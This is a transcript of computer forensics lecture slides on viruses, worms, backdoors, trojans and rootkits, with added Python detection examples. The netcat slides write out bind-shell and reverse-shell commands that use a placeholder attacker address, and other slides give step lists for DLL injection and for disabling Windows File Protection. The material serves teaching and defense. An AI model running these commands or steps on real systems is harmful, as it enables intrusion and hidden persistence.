Viruses, Worms, Mobile Code
COEN 252: Computer Forensics
(Transcript of a PowerPoint presentation.)

Viruses: The Principle
- A virus attaches itself to a host that can execute the instructions contained in the virus.
- When the host is invoked, the virus copies itself to other locations on the system.

Executables: Companion Infection Technique
- The OS calls the virus when the user requests the companion file.
- Windows: the virus is Notepad.com, hiding behind Notepad.exe. It sets the hidden attribute to prevent the virus file from being seen, then launches the true Notepad.exe from the virus.
- If the user selects Start > Run and types in notepad, Windows starts the virus (Notepad.com is found before Notepad.exe).

Executables: Companion Infection Technique
- Windows: the virus renames Notepad.exe to Notepad.ex_ and hides it. The virus takes the place of Notepad.exe.
- Works with shortcuts.
- Used in the Trilisa virus / worm (2002).

Executables: Companion Infection Technique
- The virus uses the alternate data stream feature of NTFS: streams look like one file in Explorer and in directory listings.
- The system activates the default stream, which is the virus. The virus then calls the alternate stream.
- Win2KStream virus (2000).

Executables: Overwriting Technique
- The virus replaces part of an executable. Usually the executable loses functionality, so users will know that something is wrong.

Executables: Prepending Technique
- The virus is placed in front of the executable. After the virus executes, the host program is called.
- Very easy for .com files. Easy to clean files.
- The Bliss virus had a disinfect mode built into it.
- Used by the NIMDA worm.

Executables: Appending Infection Technique
- The virus inserts itself at the end of the host file and adds a jump at the beginning of the host file.
- Stealth techniques for prepending and appending: compress the host; when the virus calls the host, the host is uncompressed into RAM. Fill up the total package (virus plus compressed host) to the same size as the original host, and choose the filler so that the checksum is not changed.

Boot Sector Modification
- Target: Master Boot Record or partition boot sector.
- Michelangelo virus (1991): replaced the MBR boot strap and moved the original elsewhere on disk. First the virus loads itself into memory, then it passes control to the original MBR boot sector. It places itself into the boot sector of every floppy.
- The memory-resident copy of the virus is attached to low-level BIOS drivers and gets called when these are executed.
- Can no longer spread under WinNT, Win2K, WinXP; it can only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.

Infection of Document Files
- Many programs use macros: MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, ...
- WinOffice runs code in subroutines such as Document_Open(), Document_Close(), AutoExec(), ...
- A virus can copy itself to the victim's Normal.dot file.
- The Normal.dot file is processed whenever WinOffice starts.

Other Targets
- Source code
- Scripts: Visual Basic scripts (.vbs) used by the OS (Startup.vbs, Exec.vbs), shell scripts, Perl scripts
- Java class files: platform-independent viruses

Propagation Techniques
- Removable storage: boot sector viruses, executable viruses. Yamaha's CD-R drive firmware update contained the Chernobyl virus.
- Email attachments
- Shared directories

Anti-Virus Defense
- Antivirus software on gateways: user workstations, file servers, mail servers, application servers, border firewalls, handhelds.

Anti-Virus Defense
- Virus signatures: look for small patterns indicative of a known virus. Problem: polymorphic viruses.
- Heuristics: look for programs with bad behavior: attempts to access the boot sector, to locate all files in a directory, to write to an .exe file, to delete hard drive contents, ...

Anti-Virus Defense
- Integrity verification: generate a database of hashes of important files; recalculate these hashes and compare them to the known values.
- Configuration hardening: least privilege; minimize active components; set warnings (e.g. against macros).
- User education
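The integrity verification just described, as an added example (not code from the slides): a baseline of SHA-256 hashes is built, stored, and later re-checked. The algorithm, the JSON database format and the demo directory are assumptions; note that a cryptographic hash, unlike the checksum that the size-padding trick on the appending slide defeats, cannot be matched by adjusting filler bytes.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

# Added example, not from the slides. Hash algorithm is an assumption (the
# slide names none); SHA-256 rather than a CRC or file size, because an
# infected file padded back to its original size with tuned filler can keep
# a CRC unchanged but not a collision-resistant hash.

def file_digest(path, chunk_size=65536):
    """Return the hex SHA-256 of a file, streamed so large files fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root):
    """Walk `root` and record {relative path: {size, sha256}} for every file."""
    root = Path(root)
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            rel = p.relative_to(root).as_posix()
            baseline[rel] = {"size": p.stat().st_size, "sha256": file_digest(p)}
    return baseline

def save_baseline(baseline, db_path):
    # The database must live where the attacker cannot rewrite it (read-only
    # media, another host); a baseline stored on the monitored system is only
    # as trustworthy as that system.
    with open(db_path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)

def load_baseline(db_path):
    with open(db_path) as f:
        return json.load(f)

def verify(root, baseline):
    """Recompute hashes under `root` and diff them against the baseline.

    Returns {'modified', 'missing', 'added'}. A file whose size still matches
    but whose hash differs is reported as modified: the size-preserving case.
    """
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current
                      and current[p]["sha256"] != baseline[p]["sha256"])
    missing = sorted(p for p in baseline if p not in current)
    added = sorted(p for p in current if p not in baseline)
    return {"modified": modified, "missing": missing, "added": added}

def demo():
    """Self-contained run on a constructed temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "bin"
        root.mkdir()
        (root / "ls").write_bytes(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        (root / "ps").write_bytes(b"#!/bin/sh\nexec /bin/ps \"$@\"\n")
        db = Path(tmp) / "baseline.json"
        save_baseline(build_baseline(root), db)

        # Simulated trojaning that keeps the file size identical: flip one byte.
        data = bytearray((root / "ps").read_bytes())
        data[-2] ^= 0x01
        (root / "ps").write_bytes(bytes(data))
        (root / "ls").unlink()                   # a binary that went missing
        (root / ".hidden").write_bytes(b"x")     # a file the baseline never saw

        return verify(root, load_baseline(db))

if __name__ == "__main__":
    print(demo())
```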

Anti-Anti-Virus Defense
- Stealthing: hide virus files; intercept scanning of infected files; slow the rate of infection; ...
- Polymorphism and metamorphism: change the order of instructions in the virus code; use equivalent code (increment = subtracting -1); encrypt most of the virus body; slightly change the functionality of the virus as it spreads.

Anti-Anti-Virus Defense
- Antivirus software deactivation: kill processes known to be antivirus processes; disable internet access to the antivirus vendor's pages; change security settings (e.g. allow Word macros to run).

Worms
- Worm: propagates across a network. Typically does not require user action for propagation.
- Virus: infects files. Typically requires user interaction.

Worm Components
- Warhead
- Propagation engine
- Target selection algorithm
- Scanning engine
- Payload

Worm Warhead
- A piece of code that exploits a vulnerability on the target system.
- Exploits such as buffer overflow exploits, file sharing attacks, e-mail, common misconfigurations.

Worm Propagation Engine
- After gaining access, the worm must transfer itself to the target machine. Some worms are completely contained in the warhead.
- File transfer mechanisms: FTP, TFTP, HTTP, SMB (MS Server Message Block): Windows file sharing, Unix servers running Samba.

Worm Target Selection Algorithm
- Once the worm has gained control of a target, it starts looking for new targets: e-mail addresses, host lists, trusted systems, Network Neighborhood, DNS queries, randomly selected IP addresses.

Worm Scanning Engine
- Once targets are identified, the worm scans them for the original vulnerability.

Worm Payload
- Some specific action done on behalf of the attacker: opening up a backdoor; planting a distributed denial of service attack; performing complex calculations: password cracking, math research (actually happened).

Worm Spread
- Worm spread is limited by the diversity of machines. A tiny worm that targeted only machines running security software from a medium-sized company was successful in infecting most machines.
- Worms can contain support for multiple entry methods.
- Too many victims crash.
- Fast worms can cause network congestion.

Worm Trends
- Multiplatform worms
- Multiexploit worms
- Zero-day exploit worms: no chance to patch
- Fast-spreading worms (Warhol / Flash): pre-scan targets
- Polymorphic worms: change appearance
- Metamorphic worms: change functionality

Worm Defenses
- Ethical (?) worms
- Antivirus tools
- Fast patching services
- Firewalling: block arbitrary outbound connections; prevents spreading.
- Establishment of incident response capabilities

Malicious Mobile Code

Backdoors
- Backdoor: a program that allows attackers to bypass normal security controls on a system, gaining access to which they are not entitled.

Backdoor Types
- Local escalation of privilege
- Remote execution of individual commands
- Remote command-line access
- Remote control of the GUI

Backdoor Installation
- Attacker has compromised the system.
- A virus, worm, or malicious mobile code installs the backdoor.
- Social engineering: tricking the victim into installing the backdoor.
- ...

Starting Backdoors Automatically
- The attacker wants to maintain access to the system, so the backdoor needs to restart whenever the system restarts.
- Methods are OS dependent.

Starting Backdoors Automatically on Windows
- Altering startup files and folders
- Registry
- Task Scheduler

Starting Backdoors Automatically on Windows: Startup Folders and Files
- Autostart folders for individual users and for all users.

Starting Backdoors Automatically on Windows
- Use win.ini, system.ini: modify "shell=explorer.exe" on Win9x.
- wininit, winstart.bat (Win9x), Autoexec.bat (Win9x), Config.sys (Win9x)

Starting Backdoors Automatically on Windows
- Registry keys that start programs on login or reboot, under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\: RunServicesOnce, RunServices, RunOnce, Run, RunOnceEx
- The same keys under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\: RunServicesOnce, RunServices, RunOnce, Run, RunOnceEx

Starting Backdoors Automatically on Windows
- Further registry keys that start programs on login or reboot:
  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
  HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts
  Explorer\Run
- The same keys under HKCU:
  HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
  HKCU\SOFTWARE\Policies\Microsoft\Windows\System\Scripts
  Explorer\Run

Starting Backdoors Automatically on Windows
- Registry key HKCR\exefile\shell\open\command indicates a program that will be run every time another .exe is run.

Starting Backdoors Automatically on Windows
- Use the Task Scheduler.
- Check scheduled tasks with Autoruns from Sysinternals.
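An offline triage of the autostart registry locations listed on the preceding slides, as an added example (not code from the slides): it parses a `reg export` text file and flags Run-style entries that start programs from untrusted paths, plus Winlogon and exefile values that differ from their defaults. The sample export, the trusted-directory allowlist and the expected defaults (Userinit `C:\Windows\system32\userinit.exe,`, Shell `explorer.exe`, exefile command `"%1" %*`) are this example's assumptions.

```python
import re

# Added example, not from the slides. Input: .reg text as written by
# "reg export". SAMPLE_REG below is constructed for the example.
AUTORUN_KEYS = (
    r"\Microsoft\Windows\CurrentVersion\Run",
    r"\Microsoft\Windows\CurrentVersion\RunOnce",
    r"\Microsoft\Windows\CurrentVersion\RunOnceEx",
    r"\Microsoft\Windows\CurrentVersion\RunServices",
    r"\Microsoft\Windows\CurrentVersion\RunServicesOnce",
    r"\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad",
    r"\Policies\Explorer\Run",
)
# (key suffix, value name) -> assumed known-good default, compared case-insensitively.
EXPECTED = {
    (r"\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit"): r"C:\Windows\system32\userinit.exe,",
    (r"\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell"): "explorer.exe",
    (r"exefile\shell\open\command", "@"): r'"%1" %*',
}
# Constructed allowlist of directories an autorun entry may legitimately point into.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")

def _unescape(s):
    # reg export writes \" for a quote and \\ for a backslash inside strings.
    return s.replace('\\"', '"').replace("\\\\", "\\")

def parse_reg(text):
    """Parse .reg text into {key: {value_name: data}}; string data is unescaped,
    other types (dword:, hex:) are kept as the raw text after '='."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            continue
        m = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if not m:
            continue
        name = "@" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        data = m.group(2)
        if data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys

def _exe_path(command):
    """First token of a command line, quotes stripped, lower-cased."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)].lower()
    return command.split()[0].lower() if command else ""

def triage(reg_text):
    """Return findings: autorun entries outside TRUSTED_DIRS and altered defaults."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        k = key.lower()
        for suffix in AUTORUN_KEYS:
            if k.endswith(suffix.lower()):
                for name, data in values.items():
                    if not _exe_path(data).startswith(TRUSTED_DIRS):
                        findings.append(f"{key}\\{name}: starts {data!r} from an untrusted path")
        for (suffix, vname), expected in EXPECTED.items():
            if k.endswith(suffix.lower()) and vname in values:
                if values[vname].lower() != expected.lower():
                    findings.append(f"{key}\\{vname}: {values[vname]!r} differs from default {expected!r}")
    return findings

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"svchost"="C:\\Users\\Public\\svchost.exe -l -p 2000"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\nc.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\Users\\Public\\wrap.exe\" \"%1\" %*"
'''

if __name__ == "__main__":
    for finding in triage(SAMPLE_REG):
        print(finding)
```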

Starting Backdoors Automatically on Unix
- Modifying the init daemon
- Modifying system and service initialization scripts
- Modifying the internet daemon script
- Changing user startup scripts
- Scheduling jobs with cron

Starting Backdoors Automatically on Unix
- Modify the init daemon: init is the first process to start. It uses /etc/inittab to find other processes that need to be started; the attacker merely adds a line to inittab.

Starting Backdoors Automatically on Unix
- Modify system and service initialization scripts: about 20+ system scripts, located in /etc/rc.d or /etc/init.d. Or merely plant a backdoor in an initialization script for another service, e.g. the ppp daemon for PPP modem dial-up connections.
- inetd network daemon: change /etc/inetd.conf.

Starting Backdoors Automatically on Unix
- Adjust user startup scripts: .login, .cshrc, /etc/profile, .logout, .xinitrc, .xsession
- Schedule jobs with cron.

Backdoor Defenses
- System integrity tools like Tripwire.

Backdoor with netcat
- netcat compiles into the executable nc.
- On the victim:
  nc -l -p 2000 -e cmd.exe (Windows)
  nc -l -p 2000 -e /bin/sh (Unix)
  sets up a listener on port 2000.
- On the attacker:
  nc [victim address] 2000
  gives a command shell.
- Only works if the attacker can establish a TCP connection to the port on the victim. Firewalls can block this.

Backdoor with netcat: Shoveling a Shell
- Use an open door in the firewall.
- On the attacker's machine: nc -l -p 80 (netcat listener on port 80).
- On the victim's machine: nc [attacker's address] 80 -e cmd.exe initiates an outgoing connection to the attacker and then executes a shell.

Backdoor with netcat
- Alternatives to netcat: cryptcat, Tini, Q, Bindshell, Md5bd, UDP_Shell, TCPshell, Crontab-backdoor

Virtual Network Computing
- Remote GUI tools: Virtual Network Computing (VNC), Windows Terminal Services, Remote Desktop Service, Citrix MetaFrame, PCAnywhere, Dameware, Back Orifice 2000, SubSeven (www.megasecurity.org)

Virtual Network Computing
- A VNC server can be used to shovel a shell. It can be remotely installed:
  1. Attacker has remote shell access on the victim.
  2. Attacker installs a copy of VNC on his own machine.
  3. Attacker exports the registry keys associated with VNC to the victim.
  4. Attacker moves four files to the victim.
  5. Attacker adds the registry changes to the victim. This will display a "VNC installation successful" message on the victim.
  6. Attacker starts VNC.

Defenses against Backdoor Shell Listeners
- Use firewalls: filter traffic in both directions; firewall individual machines.
- Look for open ports: on the network (Nmap) or locally with a trusted tool (on CD).
- Close unneeded ports.

Backdoors without Ports
- ICMP backdoor: ICMP messages don't use ports. Firewalls need to let some ICMP messages pass. ICMP messages can carry a few bytes of payload.
- ICMP backdoors: Loki, 007shell, ICMP Tunnel, available for free at www.packetstormsecurity.org.

Non-Promiscuous Sniffing Backdoors
- A sniffer in non-promiscuous mode sniffs for commands in packets destined for the local machine.

Non-Promiscuous Sniffing Backdoors: Cd00r
- Sniffs for TCP packets to ports X, Y, Z; the ports are not open.
- SYN packets to X, Y, Z: the sniffer activates the backdoor.
- The backdoor opens a TCP port and shovels a shell. This can be detected. It is, however, unnecessary with a sniffer; "future releases" will discontinue this practice and just craft special packets instead.
- When the backdoor closes, the port is closed.
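Detection logic for the Cd00r pattern above, as an added example (not code from the slides): from a log of inbound SYNs it reports a source that hits several closed ports on one host within a short window (the knock), and a snapshot diff reports the port the backdoor then opens. The log format, the listening-port baseline and the thresholds are this example's assumptions; the log lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example, not from the slides. LOG is a constructed record of SYNs
# that reached the host: "timestamp src dst dport tcp-flags". In practice
# this comes from a packet filter's log or an IDS in front of the host.
LOG = """\
2024-05-01T10:00:01 203.0.113.7 192.0.2.10 22 S
2024-05-01T10:00:02 203.0.113.7 192.0.2.10 80 S
2024-05-01T10:01:00 198.51.100.9 192.0.2.10 31337 S
2024-05-01T10:01:01 198.51.100.9 192.0.2.10 6667 S
2024-05-01T10:01:02 198.51.100.9 192.0.2.10 4444 S
2024-05-01T10:01:05 198.51.100.9 192.0.2.10 5002 S
2024-05-01T10:30:00 192.0.2.55 192.0.2.10 22 S
"""
LISTENING_PORTS = {22, 80}   # constructed baseline, e.g. from netstat/lsof on the host

def parse_log(text):
    """Return [(timestamp, src, dst, dport)] for bare SYNs (no ACK flag)."""
    events = []
    for line in text.splitlines():
        ts, src, dst, dport, flags = line.split()
        if "S" in flags and "A" not in flags:
            events.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return events

def find_knocks(events, listening, window=timedelta(seconds=10),
                min_ports=3, max_ports=8):
    """Return [(src, dst, [ports])] for bursts of SYNs to closed ports.

    A knock is a source hitting a handful of distinct closed ports within
    `window`; a full port scan hits far more and is excluded by max_ports so
    it can be reported separately. SYNs to listening ports are ordinary.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port in sorted(events):
        if port not in listening:
            by_pair[(src, dst)].append((ts, port))
    knocks = []
    for (src, dst), hits in by_pair.items():
        for start in range(len(hits)):
            burst = [p for ts, p in hits[start:] if ts - hits[start][0] <= window]
            if min_ports <= len(set(burst)) <= max_ports:
                knocks.append((src, dst, burst))
                break            # one report per (src, dst) pair
    return knocks

def new_listeners(before, after):
    """Ports present in the later listening snapshot only: the port the
    backdoor opens to shovel its shell. Take snapshots around a knock."""
    return sorted(set(after) - set(before))

if __name__ == "__main__":
    print(find_knocks(parse_log(LOG), LISTENING_PORTS))
    print(new_listeners({22, 80}, {22, 80, 5002}))
```

The slide notes that later versions drop the open-port step, so the process and promiscuous-mode checks from the defenses slide further down still apply.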

Promiscuous Sniffing Backdoors
- A promiscuous sniffer can gather packets sent to any machine on the same LAN segment. The destination IP address of the suspicious traffic does not have to be the victim machine's.

Promiscuous Sniffing Backdoors
- Scenario: the attacker has compromised the DNS server and installed a promiscuous sniffing backdoor there.

Promiscuous Sniffing Backdoor
- The attacker sends a packet to the web server at port 80. The message passes through the firewall.

Promiscuous Sniffing Backdoor
- The sniffer on the DNS server sniffs the packet. The web server does not know what to do with a malformed request.
- Firewall: message to web server, let pass.

Promiscuous Sniffing Backdoor
- The backdoor on the DNS server reacts to the packet and sends a message back to the attacker, with a spoofed return address from the web server. The firewall lets it pass.
- Firewall: message from web server, let pass.

Defenses against Backdoors without Ports
- Backdoors still create running processes.
- Backdoors still create network packets.
- Backdoors might put network cards into promiscuous mode.

Trojan Horses
- A program with added functionality.

Trojan Horses: Hiding Names
- Change the name (of netcat, VNC, ...).
- Play with Windows suffixes: "just_text.txt                    .exe" is ONE word with a bunch of spaces in it.
- Use the .shs suffix (suppressed by the system): "just_text.txt                    .shs" is a shell scrap object.
- Windows uses the suffix to decide what to do with a file.
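A filename triage for the two naming tricks on this slide and for the companion-infection pairs from the Executables slides (Notepad.com beside Notepad.exe, Notepad.ex_ left next to a replaced Notepad.exe), as an added example (not code from the slides). The extension sets and the directory listing are constructed assumptions for the example.

```python
import re
from pathlib import PureWindowsPath

# Added example, not from the slides. Extension sets are assumptions: the
# slides name only .exe, .com and .shs.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js"}
SUPPRESSED_EXTS = {".shs", ".shb", ".lnk", ".pif"}   # Explorer never shows these
DOCUMENT_EXTS = {".txt", ".doc", ".jpg", ".pdf"}

# Windows dispatches on the final extension; look for a decoy extension,
# a run of padding whitespace, then the real one.
_DECOY = re.compile(r"^(?P<shown>.+?\.[A-Za-z0-9]{1,5})[ \t]{2,}(?P<real>\.[A-Za-z0-9]{1,4})$")

def check_name(name):
    """Return a list of findings for one file name (empty if it looks ordinary)."""
    findings = []
    path = PureWindowsPath(name)
    real_ext = path.suffix.lower()
    m = _DECOY.match(name)
    if m:
        findings.append(f"decoy extension: displays as {m.group('shown')!r} "
                        f"but Windows dispatches on {m.group('real').lower()}")
    if real_ext in SUPPRESSED_EXTS:
        findings.append(f"suffix {real_ext} is never shown by Explorer")
    inner_ext = PureWindowsPath(path.stem.rstrip()).suffix.lower()
    if real_ext in EXECUTABLE_EXTS | SUPPRESSED_EXTS and inner_ext in DOCUMENT_EXTS:
        findings.append(f"double extension: document-looking name actually ends in {real_ext}")
    return findings

def find_companions(listing):
    """Flag companion pairs among file names from one directory.

    For a bare command name Windows starts .com before .exe, and a .ex_ file
    is the tell-tale of the 'rename the real program, take its place' variant.
    """
    stems = {}
    for n in {x.lower() for x in listing}:
        p = PureWindowsPath(n)
        stems.setdefault(p.stem, set()).add(p.suffix)
    findings = []
    for stem, exts in sorted(stems.items()):
        if ".exe" in exts and ".com" in exts:
            findings.append(f"{stem}.com shadows {stem}.exe (companion infection pattern)")
        if ".exe" in exts and ".ex_" in exts:
            findings.append(f"{stem}.ex_ next to {stem}.exe (renamed original?)")
    return findings

def triage(listing):
    """Run both checks over a directory listing; returns {name: findings}."""
    report = {n: check_name(n) for n in listing if check_name(n)}
    companions = find_companions(listing)
    if companions:
        report["<companions>"] = companions
    return report

SAMPLE_LISTING = [          # constructed, not taken from a real system
    "Notepad.exe", "Notepad.com", "calc.exe", "calc.ex_",
    "just_text.txt                           .exe",
    "invoice.pdf.shs", "readme.txt",
]

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_LISTING).items():
        print(name, "->", findings)
```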

Trojan Horses: Hiding Names
- Take someone else's name. Overeager system administrators might even remove the legitimate program, thinking it might be your fake program.
- Windows does not let you kill programs with certain names, regardless of content: csrss.exe, services.exe, smss.exe, System, System Idle Process, winlogon.exe. There might be more than one legitimate process named winlogon or csrss.exe.

Trojan Horses: Hiding Names
- Use common typos of important files for a Trojan: ifconfig instead of ipconfig.

Trojan Horses: Defenses
- Pskill will kill any horse / process.
- Fport and lsof will find open ports associated with the horse.
- Tripwire could find substitutes for executables.
- Filter email attachments that are executable.

Wrappers
- Wrap malware in a good program. A.k.a. binders, packers, exe binders, exe joiners.
- AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle, Perl2Exe, Saran Wrap, TOPV4, Trojan Man
- Combat with anti-virus software, file system integrity checkers (Tripwire), posted MD5 / SHA1 values of downloads.

Definition of Rootkit
- Rootkits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine.

Unix User Mode Rootkits
- Rootkits are bundled packages consisting of: binary replacements that provide backdoor access; binary replacements that hide the attacker; other tools for hiding; additional odds and ends; an installation script.

Unix User Mode Rootkits: LRK
- Around since the early nineties. Version 6 is appearing.

Unix User Mode Rootkits: LRK
- Backdoor access: Trojan login, rsh, ssh. Altered login, rshd, sshd: same functionality, but with a special backdoor password for "rewt" that gives root access.
- Remote shell on a chosen port: altered inetd, tcpd.
- Local privilege escalation backdoors: chfn, chsh, passwd, su.

Unix User Mode Rootkits: LRK
- Binary replacements that hide the attacker:
  Processes: ps, top, pidof, killall, crontab
  Network use: netstat, ifconfig
  Files: ls, find, du (omits space taken by hidden files)
  Events: syslogd

Unix User Mode Rootkits: LRK
- Other tools for hiding:
  fix: resets the MAC times of trojaned system files; pads files so that the CRC check matches the one of the original files.
  zap2, wtmp: blank out / edit information in important files: utmp and wtmp store data on users currently / ever logged in; btmp stores data on bad logins; lastlog stores data on the last login for each user.

Unix User Mode Rootkits: LRK
- Goodies:
  bindshell: creates a backdoor listener; the attacker connects to the listener with netcat.
  sniffer: linsniffer grabs IDs and passwords for ftp, telnet.

Unix User Mode Rootkits: LRK
- LRK installation script: the makefile allows the configuration to be chosen. No need to understand any of the workings of LRK; installs in seconds / a few minutes.

Unix User Mode Rootkits: URK
- Universal Root Kit: functions on a variety of Unix variants. Has slightly less functionality than LRK.

Ext2 Manipulations
- RunEFS and Defiler's Toolkit foil computer forensics investigations on a UNIX machine.
- RunEFS adds pointers to good blocks to the bad blocks inode and stores data in them. The Coroner's Toolkit and derivatives don't look at these blocks.

Ext2 Manipulations
- Defiler's Toolkit destroys data that a forensics tool can harvest. shred and other overwrite tools destroy data in a block; Defiler's Toolkit destroys inode and directory information as well.
- Necrofile scrubs inodes clean.
- Klismafile overwrites directory entries associated with deleted files. This leaves blank spots in a directory, which shows that someone used Klismafile.

Windows User Mode Rootkits: Windows File Protection (WFP)
- Scans for changes to critical executables and libraries. Compares digital signatures of 1700 files to a protected file.
- If WFP detects a change, it searches for an authorized file in different locations.
- WFP can be altered by: Windows Service Pack installations (Update.exe), hotfix distributions (Hotfix.exe), the Windows Update feature, the Windows Device Installer.

Windows User Mode Rootkits
- Implementing user mode rootkits in Windows: use existing interfaces; overwrite files; use DLL injection and API hooking to manipulate running processes in memory.

Windows User Mode Rootkits
- Use existing interfaces: FakeGINA sits between winlogon and msgina.
- Windows uses Graphical Identification aNd Authentication (GINA). Windows allows system administrators to install third-party GINA tools; Windows ships with a default GINA (msgina.dll).
- The attacker sets a registry key under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to install FakeGINA. FakeGINA gathers passwords, then passes the logon credentials to the real msgina.dll.

Windows User Mode Rootkits: Changing WFP Settings
- WFP configuration is stored in the registry.
- The attacker can change a system file and then:
  1. Delete the version in the DLL cache. WFP cannot find a correct version and sends a message requesting the system CD. The administrator might ignore the message.
![Page 89: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/89.jpg)
Windows User Mode Rootkits
Attacker can
2. alter the location of the dllcache directory by modifying the registry (SFCDllCacheDir). WFP then checks signatures against the wrong cache and reports many mismatches; the event log fills with warnings.
3. turn off WFP by changing a registry value (SFCDisable). WFP stays active until reboot and displays a warning message after reboot.
![Page 90: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/90.jpg)
Windows User Mode Rootkits
Attacker can
4. set SFCDisable to the undocumented value 0xFFFFFF9D. This completely disables WFP on Windows 2000: no warning dialog, only an event log message that WFP is inactive.
Code Red II used method 4.
![Page 91: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/91.jpg)
Windows User Mode Rootkits
DLL Injection
forces a process to load a DLL it never requested:
Allocate space in the victim process for the code to run (VirtualAllocEx).
Allocate space in the victim process for that code's parameters, e.g. the path name of the DLL (VirtualAllocEx).
Write name and code into the memory of the victim process (WriteProcessMemory).
Create a thread in the victim process that starts at the written code, or directly at LoadLibrary with the path as its argument (CreateRemoteThread); the loader maps the DLL and runs its DllMain inside the victim.
Free the allocated memory and close the handles after the remote thread has completed.
![Page 92: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/92.jpg)
Windows User Mode Rootkits
DLL injection allows the attacker to hijack any process he can open. Opening processes that belong to other users or to the system requires the Debug Programs right (SeDebugPrivilege), which Administrators hold by default.
Attacker uses DLL injection to hook the APIs of a running process that displays information on the screen (process lists, directory listings, network connections).
The hooked function still calls the original function, but filters what it returns, so not all of the data is displayed.
![Page 93: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/93.jpg)
Windows User Mode Rootkits
AFX Windows Rootkit
Attacker uses the AFX Windows Rootkit configuration console on his own machine to generate the rootkit binary, then executes it on the victim's machine.
AFX WinRK installs itself in the System32 directory, creates iexplore.dll and explorer.dll, and injects both into explorer.exe, the process that displays the GUI to users.
The injected DLLs hook the APIs explorer.exe uses and hide network connections, files, ...
![Page 94: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/94.jpg)
Rootkit Defenses
Preventing rootkits: harden systems and apply patches. A rootkit can only be installed after the attacker has gained administrator or root privileges.
Detecting rootkits: file integrity checking (signatures or hashes of system files against a trusted baseline) and rootkit identification: look for the specific changes most rootkits make.
chkrootkit for Unix
![Page 95: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/95.jpg)
Kernel Mode Rootkits
Kernel functions: process and thread management, interprocess communication, memory management, file system, hardware interrupts.
![Page 96: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/96.jpg)
Kernel Mode Rootkits
The kernel relies on hardware-level protection: ring 0 (kernel) vs. ring 3 (user) on Intel CPUs.
This prevents user processes from accessing critical kernel data structures directly.
![Page 97: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/97.jpg)
Kernel Mode Rootkit
Processes running in kernel mode belong to the kernel. Administrator and root only invoke user mode processes; these processes reach the kernel through system calls. A change in the kernel therefore changes the behavior of all processes, whatever privileges they run with.
![Page 98: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/98.jpg)
Kernel Mode Rootkit
Kernel mode rootkit capabilities: file and directory hiding, process hiding, network port hiding, promiscuous mode hiding, execution redirection, device interception and control.
